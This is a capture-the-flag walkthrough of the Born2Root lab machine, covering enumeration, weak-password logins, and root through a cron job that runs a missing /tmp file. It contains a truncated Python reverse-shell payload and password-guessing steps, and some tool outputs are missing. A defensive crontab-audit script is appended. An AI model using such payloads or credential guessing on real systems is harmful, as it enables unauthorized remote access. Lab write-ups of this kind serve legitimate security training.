BORN2ROOT — Offensive Security

Neelesh Patel
Oct 27, 2021


Offensive Security Proving Ground Complete Write-up

I exported the IP of the target machine as an environment variable, scanned the target, and found the following open ports and services:

After switching over to port 80, I found three users: martin, hadi, and jimmy. COOL!!

After busting the directories with wfuzz, the results are:

After hopping to the icons directory and enumerating all the files, there was a file containing an SSH key.

AWESOME!! So we have three users. After trying martin with the password secret lab, the login was successful.

Enumerating martin's machine, I found that the crontab runs a file every five minutes, and that file itself is missing from /tmp.

So I created a file with the same name containing a reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",0000));

With my knife listening on my root machine, and yes, it was good to go!
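From the defender's side, the cron weakness above (a scheduled job pointing at a missing file in /tmp) can be caught with a small crontab audit. This is an added example, not part of the original write-up; the sample crontab, the user jobuser, and the path /tmp/EXAMPLE_JOB.py are constructed placeholders.

```python
import os
import stat

# Constructed sample in /etc/crontab format (time fields, user, command).
# The user and job path are placeholders; the page does not give the real ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
SHELL=/bin/sh
*/5 * * * * jobuser python /tmp/EXAMPLE_JOB.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

def world_writable(directory):
    """True if any local user can create files in `directory`."""
    try:
        return bool(os.stat(directory).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def audit_crontab(text, has_user_field=True, exists=os.path.exists, writable=world_writable):
    """Return (user, path, reasons) for each risky absolute path in a cron command."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or environment assignment
        # @reboot-style shortcuts replace the five time fields.
        skip = 1 if fields[0].startswith("@") else 5
        cmd_at = skip + (1 if has_user_field else 0)
        if len(fields) <= cmd_at:
            continue  # malformed entry with no command
        user = fields[skip] if has_user_field else None
        for token in fields[cmd_at:]:
            path = token.strip("'\";")  # paths containing spaces are not handled
            if not path.startswith("/") or path == "/":
                continue
            reasons = []
            if not exists(path):
                reasons.append("missing")
            if writable(os.path.dirname(path)):
                reasons.append("parent directory is world-writable")
            if reasons:
                findings.append((user, path, reasons))
    return findings

if __name__ == "__main__":
    for user, path, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{user}: {path}: {', '.join(reasons)}")
```

Any job flagged here should be repointed at a script in a directory that only the job's owner can write to, or removed if the script no longer exists.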

Enumerating the machine, I found nothing special, and the only user left was hadi, so I tried hadi with the normal password of hadi123 and guess what, it worked!!!!

Enumerating the machine, and after switching user with the su command, I tried the same password and it was a successful login.

Clearly we are now root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!
